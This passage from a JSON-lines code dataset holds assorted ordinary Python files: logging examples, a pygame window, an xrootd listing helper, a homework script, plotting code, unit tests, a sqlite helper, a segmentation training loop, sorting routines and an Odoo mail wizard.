定义一个Handler打印INFO及以上级别的日志到sys.stderr\n\n # 绑定配置\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # 这个setLevel 不work\n fh.setLevel(logging.INFO)\n ch.setLevel(logging.INFO)\n\n # 为logger绑定输出handler\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n logger.info('all1')\n logger.debug('Quick zephyrs blow, vexing daft Jim.')\n logger.info('How quickly daft jumping zebras vex.')\n logger.warning('Jail zesty vixen who grabbed pay from quack.')\n logger.info('all2')\n logger.error('The five boxing wizards jump quickly.')\n # logger2.warning('Jail zesty vixen who grabbed pay from quack.')\n # logger2.error('The five boxing wizards jump quickly.')\n\ndef testBoth2():\n '''\n 不太秀美,写法上兼容'logging'\n :return:\n '''\n plog = 'logs/testboth.log'\n # 写log文件logging设定\n logging.basicConfig(\n level=logging.INFO, # log文件的level\n format='%(levelname)-8s %(asctime)s: %(message)s',\n datefmt='%m-%d %H:%M',\n filename=plog,\n filemode='w')\n # 输出到控制台的loging设定\n console = logging.StreamHandler() # 定义一个Handler打印INFO及以上级别的日志到sys.stderr\n console.setLevel(logging.INFO) # 控制台的level\n formatter = logging.Formatter('%(levelname)-8s: %(message)s') # 设置日志打印格式\n console.setFormatter(formatter)\n logging.getLogger().addHandler(console)\n\n# handler配置level不能生效\n# 在创建 handler之间将默认root logger的handler拉低\n# logging.root.setLevel(logging.NOTSET)\n\ndef testConfLog():\n logging_config_file = './conf/logging_config.yaml'\n\n # 设置日志\n with open(logging_config_file, 'r') as f:\n config = yaml.safe_load(f.read())\n\n logging.config.dictConfig(config)\n logger = logging.getLogger(__name__)\n logger.info('global log')\n\n# 写入多个logger\ndef test2variousfile():\n logger = logging.getLogger('alogger') # 如果不指定name将不会新建logger,而是返回一个初始创建的公共logger\n\n # 创建一些设置\n formatter = logging.Formatter('%(levelname)-8s %(name)-12s: %(message)s') # 设置日志打印格式\n # 创建一个handler,用于写入日志文件\n fh1 = logging.FileHandler('logs/various1.log')\n fh2 = logging.FileHandler('logs/various2.log')\n\n # 绑定配置\n fh1.setFormatter(formatter)\n fh2.setFormatter(formatter)\n\n # 为logger绑定输出handler\n logger.addHandler(fh1)\n logger.addHandler(fh2)\n\n logger.info('all1')\n 
logger.debug('Quick zephyrs blow, vexing daft Jim.')\n    logger.info('How quickly daft jumping zebras vex.')\n    logger.warning('Jail zesty vixen who grabbed pay from quack.')\n    logger.info('all2')\n    logger.error('The five boxing wizards jump quickly.')\n    # logger2.warning('Jail zesty vixen who grabbed pay from quack.')\n    # logger2.error('The five boxing wizards jump quickly.')\n\ndef testBoth2():\n    '''\n    不太秀美,写法上兼容'logging'\n    :return:\n    '''\n    plog = 'logs/testboth.log'\n    # 写log文件logging设定\n    logging.basicConfig(\n        level=logging.INFO, # log文件的level\n        format='%(levelname)-8s %(asctime)s: %(message)s',\n        datefmt='%m-%d %H:%M',\n        filename=plog,\n        filemode='w')\n    # 输出到控制台的logging设定\n    console = logging.StreamHandler() # 定义一个Handler打印INFO及以上级别的日志到sys.stderr\n    console.setLevel(logging.INFO) # 控制台的level\n    formatter = logging.Formatter('%(levelname)-8s: %(message)s') # 设置日志打印格式\n    console.setFormatter(formatter)\n    logging.getLogger().addHandler(console)\n\n# handler配置level不能生效\n# 在创建 handler之间将默认root logger的handler拉低\n# logging.root.setLevel(logging.NOTSET)\n\ndef testConfLog():\n    import logging.config # dictConfig requires this explicit import\n    logging_config_file = './conf/logging_config.yaml'\n\n    # 设置日志\n    with open(logging_config_file, 'r') as f:\n        config = yaml.safe_load(f.read())\n\n    logging.config.dictConfig(config)\n    logger = logging.getLogger(__name__)\n    logger.info('global log')\n\n# 写入多个logger\ndef test2variousfile():\n    logger = logging.getLogger('alogger') # 如果不指定name将不会新建logger,而是返回一个初始创建的公共logger\n\n    # 创建一些设置\n    formatter = logging.Formatter('%(levelname)-8s %(name)-12s: %(message)s') # 设置日志打印格式\n    # 创建一个handler,用于写入日志文件\n    fh1 = logging.FileHandler('logs/various1.log')\n    fh2 = logging.FileHandler('logs/various2.log')\n\n    # 绑定配置\n    fh1.setFormatter(formatter)\n    fh2.setFormatter(formatter)\n\n    # 为logger绑定输出handler\n    logger.addHandler(fh1)\n    logger.addHandler(fh2)\n\n    logger.info('all1')\n    logger.debug('Quick zephyrs blow, vexing daft Jim.')\n    logger.info('How quickly daft jumping zebras vex.')\n    logger.warning('Jail zesty vixen who grabbed pay from quack.')\n    logger.info('all2')\n    logger.error('The five boxing wizards jump quickly.')\n\n\n# 滚动日志,清除过期日志——TimedRotatingFileHandler\ndef testTimeRotatingLog():\n    #日志打印格式\n    log_fmt = '%(asctime)s\\tFile \\\"%(filename)s\\\",line %(lineno)s\\t%(levelname)s: %(message)s'\n    formatter = logging.Formatter(log_fmt)\n    #创建TimedRotatingFileHandler对象\n    log_file_handler = TimedRotatingFileHandler(filename=\"logs/timerotate.log\", when=\"S\", interval=1, backupCount=1)\n    #log_file_handler.suffix = \"%Y-%m-%d_%H-%M.log\"\n    #log_file_handler.extMatch = re.compile(r\"^\\d{4}-\\d{2}-\\d{2}_\\d{2}-\\d{2}.log$\")\n    log_file_handler.setFormatter(formatter)\n    logging.basicConfig(level=logging.INFO)\n    log = logging.getLogger('timeRotate')\n    log.addHandler(log_file_handler)\n    #循环打印日志\n    log_content = \"test log\"\n    count = 1\n    while count < 500:\n        log.error('No.{} log'.format(count))\n        time.sleep(0.01)\n        count = count + 1\n    # log.removeHandler(log_file_handler)\n\n    '''\n    filename:日志文件名的prefix;\n    when:是一个字符串,用于描述滚动周期的基本单位,字符串的值及意义如下:\n    “S”: Seconds\n    “M”: Minutes\n    “H”: Hours\n    “D”: Days\n    “W”: Week day (0=Monday),这里应该为 when='W0' or W1 W2 ,,,\n    “midnight”: Roll over at midnight\n    interval: 滚动周期,单位有when指定,比如:when=’D’,interval=1,表示每天产生一个日志文件;\n    backupCount: 表示日志文件的保留个数,超过之后会依次删除最早创建的,=0就不会删除。。。\n    !!!程序停止再次启动能把上次的接上,emmm,很nice\n    '''\n\n\nif __name__ == '__main__':\n    test2variousfile()\n    # testTimeRotatingLog()\n    # testConfLog()\n    # testBoth()\n    # test2Terminal()\n    # test2File()","sub_path":"tools/logginglog/t01test.py","file_name":"t01test.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511372390","text":"import pygame\n\n# Create a blank game window\nclass Window:\n    pygame.display.init()\n\n    def __init__(self, x, y, caption):\n        self.x = x\n        self.y = y\n\n        displayFlags = pygame.DOUBLEBUF\n\n        self.window = pygame.display.set_mode([x, y], displayFlags)\n        self.caption = pygame.display.set_caption(caption)\n        self.clock = pygame.time.Clock()\n\n        # Keep track of the high score in the current running of the game\n        self.highScore = 0\n\n    def setFPS(self, num):\n        self.clock.tick(num)\n","sub_path":"src/core/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"175220068","text":"import subprocess as sb\nimport sys, re, os\n\nxrootd = 'root://eoslhcb.cern.ch/'\n\ndef remotels_simple_py3(location,pattern = '',opt='') :\n    out = sb.check_output(\"xrdfs \"+xrootd+\" ls \"+location, shell=True).decode(\"utf-8\") \n    out = out.split('\\n')\n    out = [ x.replace(xrootd,'') for x in out if len(x) > 0 ]\n    out = [ x for x in out if len(re.findall(pattern,x)) > 0 or pattern=='' ]\n    if 'noxrd' not in opt : out = [ xrootd+x for x in out ]\n    return out\n\ndef remotels_simple(location,pattern = '',opt='') :\n    out = sb.check_output(\"xrdfs \"+xrootd+\" ls \"+location, shell=True)\n    out = out.split('\\n')\n    out = [ x.replace(xrootd,'') for x in out if len(x) > 0 ]\n    out = [ x for x in out if len(re.findall(pattern,x)) > 0 or pattern=='' ]\n    if 'noxrd' not in opt : out = [ xrootd+x for x in out ]\n    return out\n\ndef remotels_allpy(location,pattern='',opt='') :\n\n    import sys\n    if sys.version_info.major > 2 : return remotels_simple_py3(location,pattern,opt)\n    
else : return remotels_simple(location,pattern,opt)\n\ndef remotels(locations,pattern='',levels=0) :\n    \n    folders = []\n    lev = 0\n    tmpfolders = locations\n    while lev < levels :\n        newfolders = []\n        for tmp in tmpfolders :\n            try : newfolders.extend(remotels_allpy(tmp,opt='noxrd'))\n            except : continue\n        tmpfolders = newfolders\n        lev += 1\n    \n    files = [] \n    for tmp in tmpfolders :\n        try : files.extend(remotels_allpy(tmp,pattern))\n        except : continue\n\n    return files\n\ndef remote_ls_fromids(dataids) :\n    \n    base = dataids[0]\n    ids = dataids[1]\n    locs = [ base + str(i) for i in ids ]\n    return remotels(locs,levels=1,pattern='(.root)')\n\nif __name__ == '__main__' :\n\n    import argparse\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-p\",\"--path\",default = None)\n    args = parser.parse_args()\n\n    remotels(args.path)\n\n\n","sub_path":"pyutils/scripts/remotels.py","file_name":"remotels.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31652381","text":"# Python Programming.\n# Homework 2, problem 1\n# Instructor: Dr. Ionut Cardei\n# Do not distribute.\n\n# a) The algorithm:\n# 1. read string n_str from terminal\n# 2. convert n_str to int n\n# 3. if conversion fails or n <=0,\n# 3.1 print error message: \"Error: n must be positive integer\"\n# 3.2 exit program\n# 4. for a=1, a<=n, a++\n# 4.1 for b=1, a<=int(sqrt(n*n - a*a)), a++\n# 4.1 hyp_sq = a**2 + b**2\n# 4.2 c = sqrt(hyp_sq)\n# 4.3 if c == int(sqrt(hyp_sq))\n# 4.3.1 print(a,b,c)\n\n\n# now in Python:\n\nimport math\n\nn_str = input(\"Enter n: \")\n# assume this represents an int number\nn = int(n_str) # ... so this expression succeeds.\n\nif (n <= 0):\n    print(\"Error: n must be positive integer\")\n    exit(1)\n\nfor a in range(1, n+1):\n    bmax = int(math.sqrt(n**2 - a**2))\n    for b in range(1, bmax + 1):\n        hyp_sq = a**2 + b**2\n        c_float = math.sqrt(hyp_sq)\n\n        # if c is an int (a whole number):\n        if c_float == int(math.sqrt(hyp_sq)):\n            # no need to check for c<=n since b is limited\n            c = int(c_float)\n            print(a, b, c)\n","sub_path":"find-duplicates/h2_find-duplicates_pylab/h2-solutions/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"534785105","text":"from core.models import Tweet\nfrom tastypie.resources import ModelResource\n\n\nclass TweetResource(ModelResource):\n    class Meta(object):\n        queryset = Tweet.objects.all()\n        resource_name = 'tweets'\n        allowed_methods = []\n        fields = ['text', 'created_at', 'twitter_id', 'from_user', 'link']\n        always_return_data = True\n","sub_path":"api/resources/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"162417343","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom pylab import figure, axes, pie, title, show\n\n\n\nx, y = np.loadtxt('Präzession.txt', unpack=True,delimiter=',')\n\ndef f(x,a,b):\n    return a*x+b\npopt, pcov = curve_fit(f, x, y)\nprint(popt)\nprint(pcov)\n\nx_new = np.linspace(x[0], x[-1], 500)\n\n\n\n\n\n\n\nplt.figure(1)\nplt.plot(x,y,'x', label = 'Messwerte')\nplt.plot(x_new,f(x_new,*popt),'-', label='Lineare Regression')\n\n\nplt.ylabel(r'$\\frac{1}{T}/\\frac{1}{s}$')\nplt.xlabel('$B /mT$')\nplt.grid()\nplt.legend()\n\nmü = 2*np.pi*9.25077298*10**(-7) 
*1.5494*10**(-3)\nprint(mü)\n\n\nplt.savefig('Präzession.pdf')\nprint ('Fertig')\n","sub_path":"AP1/V105_Magnetisches_Moment/graphen/Präzession/Präzession.py","file_name":"Präzession.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347069193","text":"# -*- coding: utf-8 -*-\n\"\"\"比例与背景的基本操作测试用例.\"\"\"\nfrom iOS import script_ultils as sc\nimport time\nfrom unittest import TestCase\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom iOS import iOS_elements,base as ba\nfrom selenium.common.exceptions import TimeoutException\n\nclass TestProportion(TestCase):\n \"\"\"比例与背景的基本操作测试类.\"\"\"\n\n # 获取屏幕尺寸\n width, height = sc.get_size()\n img_path = sc.path_lists[0]\n\n @classmethod\n def setUpClass(cls):\n sc.driver.launch_app()\n time.sleep(3)\n\n @classmethod\n def tearDownClass(cls):\n time.sleep(3)\n sc.driver.close_app()\n\n def test_edit_proportion(self):\n '''剪辑-比例&多选.'''\n sc.logger.info('剪辑-比例')\n fun_name = 'test_edit_proportion'\n\n sc.logger.info('打开一个草稿视频')\n ba.home_first_click('更多草稿')\n\n sc.logger.info('点击草稿封面')\n ba.open_draft(iOS_elements.el_studio_draft)\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('点击“镜头编辑”')\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_name(\"镜头编辑\")).click()\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('点击\"比例\"')\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_name(\"比例\")).click()\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('切换到\"比例tab\"')\n try:\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_name(iOS_elements.btn_bg_pro)).click()\n sc.capture_screen(fun_name, self.img_path)\n except TimeoutException:\n sc.logger.info('已经在\"比例tab\"')\n\n sc.logger.info('选择\"1:1 比例\"')\n el_proportion = \"vivavideo_edit_icon_proportion_1_1\"\n ba.clip_proportion(el_proportion)\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('进入多选')\n try:\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_xpath('//XCUIElementTypeStaticText[@name=\"点击多选\"]')).click()\n sc.capture_screen(fun_name, self.img_path)\n except TimeoutException:\n sc.logger.info('当前工程只有一个镜头,无法进入多选')\n return True\n\n sc.logger.info('多选-删除')\n ba.clip_mult_select()\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('点击“存草稿”按钮')\n WebDriverWait(sc.driver, 5, 1).until(\n lambda el: el.find_element_by_name(\"存草稿\")).click()\n sc.capture_screen(fun_name, self.img_path)\n sc.logger.info('剪辑-比例测试完成')","sub_path":"iOS/VivaVideo/test_creations/test_edit/test_proportion.py","file_name":"test_proportion.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"541578677","text":"#!/usr/bin/env python3\n# coding=utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\na = np.loadtxt('../results/test.txt')\na = np.transpose(a)\nplt.figure(1)\nplt.plot(a[0],a[1])\nplt.show()\n","sub_path":"plot/result_plot.py","file_name":"result_plot.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18439966","text":"import requests, sys\n\ndata = {'domain': open(sys.argv[1], 'r').read(),\n 'problem': open(sys.argv[2], 'r').read()}\n\nresp = requests.post('http://solver.planning.domains/solve',\n verify=False, json=data).json()\n\nfor i in 
resp['result']['plan']:\n\tprint(i['name'])\n\ndef dumPlan(domain_path, problem_path, name):\n\n\tdata = {'domain': open(domain_path, 'r').read(),\n 'problem': open(problem_path, 'r').read()}\n\n\tresp = requests.post('http://solver.planning.domains/solve',verify=False, json=data).json()\n\n\tfor i in resp['result']['plan']:\n\t\tprint(i['name'])\n","sub_path":"planner.py","file_name":"planner.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"385863231","text":"# coding: utf-8\n\n\nimport os\n\nimport pytest\n\nimport openslide\nfrom histolab.data import _has_hash, _load_svs, cmu_small_region, data_dir\n\nfrom ...fixtures import SVS\nfrom ...unitutil import function_mock\n\n\ndef test_data_dir():\n # data_dir should be a directory that can be used as a standard directory\n data_directory = data_dir\n assert \"cmu_small_region.svs\" in os.listdir(data_directory)\n\n\ndef test_cmu_small_region():\n \"\"\" Test that \"cmu_small_region\" svs can be loaded. \"\"\"\n cmu_small_region_image, path = cmu_small_region()\n assert cmu_small_region_image.dimensions == (2220, 2967)\n\n\ndef test_load_svs(request):\n file = SVS.CMU_1_SMALL_REGION\n _fetch = function_mock(request, \"histolab.data._fetch\")\n _fetch.return_value = file\n\n svs, path = _load_svs(file)\n\n assert type(svs) == openslide.OpenSlide\n assert path == file\n\n\n@pytest.mark.parametrize(\n \"file, hash, expected_value\",\n ((SVS.CMU_1_SMALL_REGION, \"1234abcd\", True), (\"/fake/file\", \"1234abcd\", False)),\n)\ndef it_knows_its_hash(request, file, hash, expected_value):\n file = file\n file_hash_ = function_mock(request, \"histolab.data.file_hash\")\n file_hash_.return_value = hash\n\n has_hash = _has_hash(file, hash)\n\n assert has_hash is expected_value\n","sub_path":"tests/unit/data/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"495019181","text":"import sqlite3\n\nclass DB:\n @classmethod\n def get_db(cls):\n return sqlite3.connect(\"./db.sqlite\")\n\n @classmethod\n def seed(cls):\n con = cls.get_db()\n con.cursor().execute('CREATE TABLE IF NOT EXISTS entries (date INTEGER NOT NULL, read INTEGER NOT NULL DEFAULT 0);')\n con.commit()\n con.close()\n\n @classmethod\n def add_entry(cls, date):\n con = cls.get_db()\n con.cursor().execute('INSERT INTO entries VALUES (?, 0);', (date,))\n con.commit()\n con.close()\n\n @classmethod\n def get_entries(cls, offset = 0, paginate_size = 10):\n con = cls.get_db()\n ret = con.cursor().execute('SELECT rowid, * FROM entries ORDER BY date DESC LIMIT ? 
OFFSET ?;', (paginate_size, paginate_size * offset)).fetchall()\n con.close()\n return ret\n\n @classmethod\n def count_entries(cls):\n con = cls.get_db()\n ret = con.cursor().execute('SELECT COUNT(*) FROM entries;').fetchone()\n con.close()\n return ret\n\n @classmethod\n def mark_read(cls, id):\n con = cls.get_db()\n con.cursor().execute('UPDATE entries SET read = 1 WHERE rowid = ?;', (id,))\n con.commit()\n con.close()\n\n @classmethod\n def mark_unread(cls, id):\n con = cls.get_db()\n con.cursor().execute('UPDATE entries SET read = 0 WHERE rowid = ?;', (id,))\n con.commit()\n con.close()\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"619264933","text":"#coding=utf-8\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.data as data\nfrom torch.autograd import Variable as V\n\nimport cv2\nimport os\nimport numpy as np\nimport torch.backends.cudnn as cudnn\nimport models\n\nfrom models.seg_hrnet import HighResolutionNet\nfrom models.ccnet import ResNet\nimport argparse\nfrom time import time\nimport sys\nfrom framework import MyFrame\nfrom loss.loss_sets import dice_bce_loss, CrossEntropy, FocalLoss, OhemCrossEntropy, CriterionDSN\nfrom dataloader import ImageFolder\nfrom tensorboardX import SummaryWriter\nfrom config import config\nfrom config import update_config\nfrom test import TTAFrame\n# from loss.criterion import CriterionDSN, CriterionOhemDSN\n\n\n#更新参数代码\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train segmentation network')\n\n parser.add_argument('--cfg',\n help='experiment configure file name',\n required=True,\n type=str)\n parser.add_argument('opts',\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER)\n\n parser.add_argument('--local_rank', type=int, default=0)\n\n args = parser.parse_args()\n update_config(config, args)\n\n return args\n\n\nargs = parse_args()\n\nprint(\"-----start------\")\n\n#参数配置\n# cudnn related setting\ncudnn.benchmark = config.CUDNN.BENCHMARK\ncudnn.deterministic = config.CUDNN.DETERMINISTIC\ncudnn.enabled = config.CUDNN.ENABLED\n\nSHAPE = config.TRAIN.IMAGE_SIZE # size of input image\nROOT = config.ROOT #训练数据的存储位置\n#imagelist = filter(lambda x: x.find('sat')!=-1, os.listdir(ROOT))\nBATCHSIZE_PER_CARD = config.TRAIN.BATCHSIZE_PER_CARD\nCARD_NUM = config.TRAIN.CARD_NUM\nlr = config.TRAIN.LR\ntotal_epoch = config.TRAIN.TOTALEPOCH\n\nif config.USESYNCBN is True:\n ##syncBN分布式参数\n print(\"use syncBN\")\n world_size = CARD_NUM #GPU个数\n torch.distributed.init_process_group(\n 'nccl',\n init_method='env://',\n world_size=world_size,\n rank=args.local_rank,\n )\n\n\n#常数\nno_optim = 0\ntrain_epoch_best_loss = 100.\n\nif os.path.exists('log/'):\n mylog = open('log/' + config.EXPNAME+'_' +str(args.local_rank) + '.log', 'a')\nelse:\n os.mkdir('log')\n mylog = open('log/' + config.EXPNAME + '_' +str(args.local_rank) +'.log', 'a')\n\n\nimagelist = os.listdir(ROOT+\"/src\")\ntrainlist = list(map(lambda x: x[:-4], imagelist)) #去后缀\n# print(trainlist)\n# 如果使用HRNet\nif config.MODEL.NAME =='seg_hrnet':\n print(\"preparing HRNet\")\n model = eval('models.'+config.MODEL.NAME +\n '.get_seg_model')(config)\nelif config.MODEL.NAME == 'ccnet':\n # if config.MODEL.PRETRAINED\n criterion = CriterionDSN() # CriterionCrossEntropy()\n model = eval('models.' 
+ config.MODEL.NAME + '.Seg_Model')(\n num_classes=config.DATASET.NUM_CLASSES, criterion=criterion,\n pretrained_model=config.MODEL.PRETRAINED\n )\n\nelse:\n print('prepareing {}'.format(config.MODEL.NAME))\n model = eval(config.MODEL.NAME+'()')\n\n#eval('solver = MyFrame(model, '+'config.TRAIN.LOSS'+', lr)')\n# #配置framework,多分类的话改第二个参数,从loss_set中去选\nif config.MODEL.NAME == 'ccnet':\n solver = MyFrame(model, CriterionDSN, config, args, lr)\nelse:\n if config.TRAIN.LOSS == 'dice_bce_loss':\n solver = MyFrame(model,dice_bce_loss, config, args,lr)\n elif config.TRAIN.LOSS == 'CrossEntropy':\n solver = MyFrame(model, CrossEntropy, config, args, lr)\n elif config.TRAIN.LOSS == 'FocalLoss':\n solver = MyFrame(model, FocalLoss, config, args, lr)\n elif config.TRAIN.LOSS == 'Ohem':\n loss = OhemCrossEntropy(ignore_label=-1, thres=config.LOSS.OHEMTHRES)\n solver = MyFrame(model, loss, config, args, lr)\n else:\n raise RuntimeError\n\nif config.TRAIN.RESUME is True:\n print('resume from {}'.format(config.TRAIN.RESUME_START))\n print('resume from {}'.format(config.TRAIN.RESUME_START), file=mylog)\n solver.load(config.MODEL.PRETRAINED)\n\ndataset = ImageFolder(trainlist, ROOT, trainclass=config.TRAIN.TRAINCLASS)#如果train class设置为-1,则代表多分类\n\n# solver = MyFrame(xxx, CrossEntropy, lr) 多分类\nif config.USESYNCBN is True:\n print('syncBN dataloader')\n batchsize = BATCHSIZE_PER_CARD #计算batch大小\n # syncBN分布式\n sampler = torch.utils.data.distributed.DistributedSampler(\n dataset,\n num_replicas=world_size,\n rank=args.local_rank\n )\n data_loader = torch.utils.data.DataLoader(\n dataset,\n # shuffle=config.TRAIN.SHUFFLE,\n batch_size=batchsize,\n num_workers=config.TRAIN.NUM_WORKERS,\n pin_memory=False,\n sampler=sampler,\n drop_last=True)\nelse:\n a = time()\n batchsize = CARD_NUM * BATCHSIZE_PER_CARD\n data_loader = torch.utils.data.DataLoader(\n dataset,\n shuffle=True,\n batch_size=batchsize,\n num_workers=config.TRAIN.NUM_WORKERS,\n drop_last=True,\n pin_memory = True) # 加了这个测试一下会不会变快\n print(\"dataloadertime\", time() - a)\n\n\n\n\ntic = time()\n\nwriter = SummaryWriter('runs/'+ config.EXPNAME)\n\n#TODO 只存储rank0的模型和输出即可\n\n\nfor epoch in range(1, total_epoch + 1):\n print('---epoch start-----')\n #data_loader_iter = iter(data_loader)\n train_epoch_loss = 0\n for img, mask in data_loader:\n\n solver.set_input(img, mask)\n train_loss = solver.optimize(config)\n train_epoch_loss += train_loss\n train_epoch_loss /= len(data_loader)\n if args.local_rank == 0:\n print('********',file=mylog)\n print('epoch:'+ str(epoch+config.TRAIN.RESUME_START) + ' time:'+ str(time()-tic), file=mylog)\n print('train_loss: {}'.format(train_epoch_loss), file=mylog)\n writer.add_scalar('scalar/train',train_epoch_loss,epoch+config.TRAIN.RESUME_START)\n print('********')\n print('epoch:'+str(epoch+config.TRAIN.RESUME_START)+' time:'+ str(time()-tic))\n print('train_loss: {}'.format(train_epoch_loss))\n split = False\n if epoch%10 == 0:\n\n BATCHSIZE_PER_CARD = config.TEST.BATCH_SIZE_PER_GPU\n label_list = config.TEST.LABEL_LIST\n source = config.TEST.ROOT\n if config.MODEL.NAME == 'seg_hrnet':\n test = TTAFrame(HighResolutionNet, 'HRNet', label_list, config=config)\n else:\n test = TTAFrame(ResNet, 'ccnet', label_list, config=config)\n test.load(config.TEST.WEIGTH)\n kappa, oa = test.test(source=source, label_list=label_list, split = split)\n split = True\n # print(text)\n print(\"kappa: \" + str(kappa) + '\\r\\n')\n print(\"oa: \" + str(oa) + '\\r\\n')\n\n # print(text, file=mylog)\n print(\"kappa: \" + str(kappa) + '\\r\\n', 
file=mylog)\n print(\"oa: \" + str(oa) + '\\r\\n', file=mylog)\n writer.add_scalar(\"Test/Accu(oa)\", oa, epoch)\n writer.add_scalar(\"Test/Accu(kappa)\", kappa, epoch)\n # print('SHAPE: {}'.format(SHAPE))\n\n #模型保存策略,停止条件和,调整lr_rate的时间\n if train_epoch_loss >= train_epoch_best_loss:\n no_optim += 1\n else:\n no_optim = 0\n train_epoch_best_loss = train_epoch_loss\n solver.save('weights/'+config.EXPNAME+'.th')#+'__'+str(args.local_rank)\n if no_optim > 10:\n print('early stop at %d epoch' % (epoch+config.TRAIN.RESUME_START), file=mylog)\n print('early stop at %d epoch' % (epoch+config.TRAIN.RESUME_START))\n break\n if no_optim > 4:\n if solver.old_lr < 5e-7:\n break\n #solver.load('weights/'+config.EXPNAME+'.th')\n solver.update_lr(5.0, factor=True, mylog=mylog)\n mylog.flush()\n\nwriter.close()\nprint ('Finish!',file=mylog)\nprint('Finish!')\nmylog.close()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301116676","text":"class adsort:\n def partition(arr,low,high): \n i = ( low-1 ) # 最小元素索引\n pivot = arr[high] \n for j in range(low , high): \n # 当前元素小于或等于 pivot \n if arr[j] <= pivot: \n i = i+1 \n arr[i],arr[j] = arr[j],arr[i] \n arr[i+1],arr[high] = arr[high],arr[i+1] \n return ( i+1 ) \n # arr[] --> 排序数组\n # low --> 起始索引\n # high --> 结束索引 \n # 快速排序函数\n def quickSort(arr,low,high): \n if low < high: \n pi = adsort.partition(arr,low,high) \n adsort.quickSort(arr, low, pi-1) \n adsort.quickSort(arr, pi+1, high)\n\n \n \n #归并排序\n def mergeSort(arr,left,right):\n if left>=right:\n return arr\n mid=(left+right)>>1\n adsort.mergeSort(arr,left,mid)\n adsort.mergeSort(arr,mid+1,right)\n adsort.merge(arr,left,mid,right)\n \n #归并排序之合并\n def merge(arr,left,mid,right):\n result=[]\n i,j=left,mid+1\n while i<=mid and j<=right:\n if arr[i]<=arr[j]:\n result.append(arr[i])\n i+=1\n else:\n result.append(arr[j])\n j+=1\n while i<=mid:\n result.append(arr[i])\n i+=1\n while j<=right:\n result.append(arr[j])\n j+=1\n arr[left:right+1]=result\n \n\n\n\n\n\narr1 = [9,7,6,3,1,8,6,4,2]\narr2 = [8,6,4,2,9,7,3,1]\nn1 = len(arr1)\nn2 = len(arr2)\nadsort.quickSort(arr1,0,n1-1)\nadsort.mergeSort(arr2,0,n2-1)\nprint (\"快速排序后的数组:\",arr1)\nprint (\"归并排序后的数组:\",arr2)\n\n","sub_path":"Week_08/advancedsort.py","file_name":"advancedsort.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108429368","text":"from odoo import models, fields, api\n\n\nclass MailComposer(models.TransientModel):\n _inherit = 'mail.compose.message'\n\n extra_attachment_ids = fields.Many2many(\n 'ir.attachment', 'mail_compose_message_ir_extra_attachments_rel',\n 'wizard_id', 'attachment_id', 'Attachments')\n\n def onchange_template_id(self, template_id, composition_mode, model, res_id):\n result = super(MailComposer, self).onchange_template_id(template_id, composition_mode, model, res_id)\n if result.get('value') and result.get('value').get('attachment_ids'):\n attachment_list = result.get('value').get('attachment_ids')[0][2]\n if self.extra_attachment_ids:\n attachment_list += self.extra_attachment_ids.ids\n return result\n\n","sub_path":"odx_sale_purchase_customization/wizard/mail_compose_message.py","file_name":"mail_compose_message.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
